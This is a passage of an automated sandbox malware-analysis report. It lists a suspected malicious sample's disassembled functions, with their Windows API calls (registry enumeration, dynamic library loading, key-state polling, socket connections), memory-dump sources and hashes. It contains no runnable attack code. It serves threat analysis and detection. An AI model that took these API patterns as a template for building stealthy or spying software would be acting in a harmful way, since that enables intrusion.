                                • Opcode Fuzzy Hash: 226d6499946d6a3ae05cec0445295e925fd571411818b74f30d4d6c20f55611a
                                • Instruction Fuzzy Hash: CA21DEB6584208BFEB15DF648CC4FFFBAECEB48744F10001AF116E6101EA609E05A774
                                Function 00CC8EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C7C657
                                  • Part of subcall function 00C7C619: GetStockObject.GDI32(00000011), ref: 00C7C66B
                                  • Part of subcall function 00C7C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C7C675
                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CC8F69
                                • LoadLibraryW.KERNEL32(?), ref: 00CC8F70
                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CC8F85
                                • DestroyWindow.USER32(?), ref: 00CC8F8D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                • String ID: SysAnimate32
                                • API String ID: 4146253029-1011021900
                                • Opcode ID: 9e474d49eee87615e9b7e80eb5b96c75bbbc24131cfa5088732723df046d3121
                                • Instruction ID: 1e8d403024632d4e534fe83b1f45108cf7d843d3a46dab1582baf2e6ac00bb64
                                • Opcode Fuzzy Hash: 9e474d49eee87615e9b7e80eb5b96c75bbbc24131cfa5088732723df046d3121
                                • Instruction Fuzzy Hash: AB219771200205AFEF104FA4EC80FBB7BAEEB59364F104A2CFA2597190CB71DD95A760
                                Function 00CAE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 00CAE392
                                • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00CAE3E6
                                • __swprintf.LIBCMT ref: 00CAE3FF
                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,00CFDBF0), ref: 00CAE43D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorMode$InformationVolume__swprintf
                                • String ID: %lu
                                • API String ID: 3164766367-685833217
                                • Opcode ID: 9919413adfdded98f8bd6717d9911121929ce8802ebae4e33228f384c5cbeb56
                                • Instruction ID: 3d9c46b0d6f127f28cd7ac11a39df6273009297860f6cc1bcba4e357f67fb489
                                • Opcode Fuzzy Hash: 9919413adfdded98f8bd6717d9911121929ce8802ebae4e33228f384c5cbeb56
                                • Instruction Fuzzy Hash: 7F214F75A40109AFCB10EFA4CC85EAEBBB8EF59714F104069F50AEB251D631DA05DBA1
                                Function 00C9D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                  • Part of subcall function 00C9D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C9D640
                                  • Part of subcall function 00C9D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9D653
                                  • Part of subcall function 00C9D623: GetCurrentThreadId.KERNEL32 ref: 00C9D65A
                                  • Part of subcall function 00C9D623: AttachThreadInput.USER32(00000000), ref: 00C9D661
                                • GetFocus.USER32 ref: 00C9D7FB
                                  • Part of subcall function 00C9D66C: GetParent.USER32(?), ref: 00C9D67A
                                • GetClassNameW.USER32(?,?,00000100), ref: 00C9D844
                                • EnumChildWindows.USER32(?,00C9D8BA), ref: 00C9D86C
                                • __swprintf.LIBCMT ref: 00C9D886
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                • String ID: %s%d
                                • API String ID: 1941087503-1110647743
                                • Opcode ID: 79c9130f5268c8068d29fea7fb11e1fbe003234e93bd88bf1489384bb6a10aa9
                                • Instruction ID: 8caa6f2a7cc3c2e1fc95b2a24565cc2b32d1705b4fadf07c1cd7aa089ce75bcc
                                • Opcode Fuzzy Hash: 79c9130f5268c8068d29fea7fb11e1fbe003234e93bd88bf1489384bb6a10aa9
                                • Instruction Fuzzy Hash: F111B471500205BBDF11BFA09CC9FEE376DAB44704F0044B9BE0ABA186CB755945AB70
                                Function 00CC1836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CC18E4
                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CC1917
                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CC1A3A
                                • CloseHandle.KERNEL32(?), ref: 00CC1AB0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                • String ID:
                                • API String ID: 2364364464-0
                                • Opcode ID: 27ca6c49954255de291562fec7ab16c5b2967e99582f8fcd2ea6c0782fc946c8
                                • Instruction ID: 2e3b160582f3c45fb118cab2d98fc06eebee9ccc8ffd56ffe0d57dd8497f7b52
                                • Opcode Fuzzy Hash: 27ca6c49954255de291562fec7ab16c5b2967e99582f8fcd2ea6c0782fc946c8
                                • Instruction Fuzzy Hash: 87818F70A50205ABDB10EF65CC86BADBBE5EF45720F18C059FD19AF382D7B4E9409B90
                                Function 00CC0579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00CC05DF
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00CC066E
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CC068C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00CC06D2
                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 00CC06EC
                                  • Part of subcall function 00C7F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CAAEA5,?,?,00000000,00000008), ref: 00C7F282
                                  • Part of subcall function 00C7F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00CAAEA5,?,?,00000000,00000008), ref: 00C7F2A6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                • String ID:
                                • API String ID: 327935632-0
                                • Opcode ID: 2c341f804cfcb07ace21b58acc5c191962f01eb7dd628ddd96a1fee1ae18940c
                                • Instruction ID: 46e461d013ebc0fed9ae964a10ebea5ebb8b58191c155a4306433aee8fecf75f
                                • Opcode Fuzzy Hash: 2c341f804cfcb07ace21b58acc5c191962f01eb7dd628ddd96a1fee1ae18940c
                                • Instruction Fuzzy Hash: 2E514775A00205DFCB10EFA8C4D1EADB7B5BF58310B248069FA56AB352DB30EE45DB90
                                Function 00CC2D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                  • Part of subcall function 00CC3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC2AA6,?,?), ref: 00CC3B0E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC2DE0
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC2E1F
                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CC2E66
                                • RegCloseKey.ADVAPI32(?,?), ref: 00CC2E92
                                • RegCloseKey.ADVAPI32(00000000), ref: 00CC2E9F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                • String ID:
                                • API String ID: 3440857362-0
                                • Opcode ID: a2e221a9700f4016ed042710f31fc12a5d504947bcca838b1321ee85595ad427
                                • Instruction ID: b492144144c02bf7043c57987224653ea4bc02b5278b5f961e4e6e915469efb2
                                • Opcode Fuzzy Hash: a2e221a9700f4016ed042710f31fc12a5d504947bcca838b1321ee85595ad427
                                • Instruction Fuzzy Hash: 3E513A71204205AFC714EF64C8C1F6AB7E8FF88314F14491DF5969B2A1DB71E905EB52
                                Function 00CCCB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 90c52745583e2c5b5e5cf3dc938c4657a7890e116d00b7999c5e914eb7b70a40
                                • Instruction ID: 83702c3afb92f931915262aa3577ae7fff10f6e0b8af9f65600da7efb15f6812
                                • Opcode Fuzzy Hash: 90c52745583e2c5b5e5cf3dc938c4657a7890e116d00b7999c5e914eb7b70a40
                                • Instruction Fuzzy Hash: 3241D135D00245BBD720DBA8CCD9FA9BB69AB19320F154269F82EE72D1C730AE01D650
                                Function 00CB1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                Download Yara Rule
                                APIs
                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CB17D4
                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CB17FD
                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CB183C
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CB1861
                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CB1869
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                • String ID:
                                • API String ID: 1389676194-0
                                • Opcode ID: 5ce92008c15ca67bf8f13652b65a3268455359639bb39abf3e8a4b7ff1ab8305
                                • Instruction ID: cad1ca11214bb4e83617b878b38d9da7fb2c701221bb00b854711ffd956875b6
                                • Opcode Fuzzy Hash: 5ce92008c15ca67bf8f13652b65a3268455359639bb39abf3e8a4b7ff1ab8305
                                • Instruction Fuzzy Hash: BF412935A00205DFCB11EF64C991AADBBF5FF48314B148099E90AAF362DB35ED05DBA0
                                Function 00C7B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetCursorPos.USER32(000000FF), ref: 00C7B749
                                • ScreenToClient.USER32(00000000,000000FF), ref: 00C7B766
                                • GetAsyncKeyState.USER32(00000001), ref: 00C7B78B
                                • GetAsyncKeyState.USER32(00000002), ref: 00C7B799
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AsyncState$ClientCursorScreen
                                • String ID:
                                • API String ID: 4210589936-0
                                • Opcode ID: 31efc5d05a69d0cafb0dd1db5395ad689d3c217f4552c898db41508b26564d5c
                                • Instruction ID: d2f6dab0b65c43e01f6de79a248c5cfc85d5fe2273087351c4392ee75ddf2ee7
                                • Opcode Fuzzy Hash: 31efc5d05a69d0cafb0dd1db5395ad689d3c217f4552c898db41508b26564d5c
                                • Instruction Fuzzy Hash: 8A415D35504219FFDF19AF65C884FEEBBB4BB45360F10821AF829962D0C730AE54DBA1
                                Function 00C9C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindowRect.USER32(?,?), ref: 00C9C156
                                • PostMessageW.USER32(?,00000201,00000001), ref: 00C9C200
                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C9C208
                                • PostMessageW.USER32(?,00000202,00000000), ref: 00C9C216
                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C9C21E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessagePostSleep$RectWindow
                                • String ID:
                                • API String ID: 3382505437-0
                                • Opcode ID: 556466a46bcc7cde704ae294285e3eaf1a1ba51db09d6f7b32213b8fa77c0f1a
                                • Instruction ID: de2bf708ee723cd260b0ad8c924c2ac56a84ab7197a07aef04427ceb527aa568
                                • Opcode Fuzzy Hash: 556466a46bcc7cde704ae294285e3eaf1a1ba51db09d6f7b32213b8fa77c0f1a
                                • Instruction Fuzzy Hash: 6431BD71900219EFDF04CFA8DE8DB9E3BB5EB05325F104229F925AB2D1C7B09A54DB90
                                Function 00C9E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                Download Yara Rule
                                APIs
                                • IsWindowVisible.USER32(?), ref: 00C9E9CD
                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C9E9EA
                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C9EA22
                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C9EA48
                                • _wcsstr.LIBCMT ref: 00C9EA52
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                • String ID:
                                • API String ID: 3902887630-0
                                • Opcode ID: 051426af932e53238c0a9300901cebae770c1453e14b8ebcfb4e8b49cbfd3c0d
                                • Instruction ID: 339878f6f3cfeda9ad7938520ad3ad83c0639c2890cecad2be9fafd5bd168770
                                • Opcode Fuzzy Hash: 051426af932e53238c0a9300901cebae770c1453e14b8ebcfb4e8b49cbfd3c0d
                                • Instruction Fuzzy Hash: A821D771604240BAEF15EB6A9C4DE7F7FACEF55764F118029F809CA0A1EE61DD40A350
                                Function 00CCDC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • GetWindowLongW.USER32(?,000000F0), ref: 00CCDCC0
                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00CCDCE4
                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CCDCFC
                                • GetSystemMetrics.USER32(00000004), ref: 00CCDD24
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00CB407D,00000000), ref: 00CCDD42
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Long$MetricsSystem
                                • String ID:
                                • API String ID: 2294984445-0
                                • Opcode ID: 70d915ef370679650a278d2fd72e0aacad2c021c7b9453cf0f6fcd8618557f65
                                • Instruction ID: c34353ebe8f4a606f5b23c0914a017a8aac100d37016432c04886b7c9f3d2d5b
                                • Opcode Fuzzy Hash: 70d915ef370679650a278d2fd72e0aacad2c021c7b9453cf0f6fcd8618557f65
                                • Instruction Fuzzy Hash: 4E21BD75A00256AFCB205F79DC88F6A77A4FB65365B104739F937CA2E0D370A911CBA0
                                Function 00C9CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C9CA86
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C9CAB8
                                • __itow.LIBCMT ref: 00C9CAD0
                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C9CAF6
                                • __itow.LIBCMT ref: 00C9CB07
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$__itow$_memmove
                                • String ID:
                                • API String ID: 2983881199-0
                                • Opcode ID: a2a08086b36f6bbca67860263783e8e544d372d68abdf34238ca14b1698833f8
                                • Instruction ID: 7e9c65e53c181c18745815008fc5e5cf1a22e6b48c61598d8619661cb3447aeb
                                • Opcode Fuzzy Hash: a2a08086b36f6bbca67860263783e8e544d372d68abdf34238ca14b1698833f8
                                • Instruction Fuzzy Hash: 3021F332700208BBDF24EAA58CCFFDE7AA9AF49710F000024F916E7181DA718E05A7A1
                                Function 00CA6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C63B1E: _wcsncpy.LIBCMT ref: 00C63B32
                                • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00CA6DBA
                                • GetLastError.KERNEL32 ref: 00CA6DC5
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CA6DD9
                                • _wcsrchr.LIBCMT ref: 00CA6DFB
                                  • Part of subcall function 00CA6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00CA6E31
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                • String ID:
                                • API String ID: 3633006590-0
                                • Opcode ID: 6b3f2f2a7895ef9aa70acb21da6b19f9e1a38c59ef87457a9fbd4c80294a1e0a
                                • Instruction ID: 6b48605517051a7609ecdc4c4569348ce9ff4251a87619c458374d342206e2fa
                                • Opcode Fuzzy Hash: 6b3f2f2a7895ef9aa70acb21da6b19f9e1a38c59ef87457a9fbd4c80294a1e0a
                                • Instruction Fuzzy Hash: BB21A265A013169ADB207774EC8EBEE33ACCF03768F280555E531C70D2EB61CE84AA54
                                Function 00CB9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00CBACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00CBACF5
                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CB9160
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB916F
                                • connect.WSOCK32(00000000,?,00000010), ref: 00CB918B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
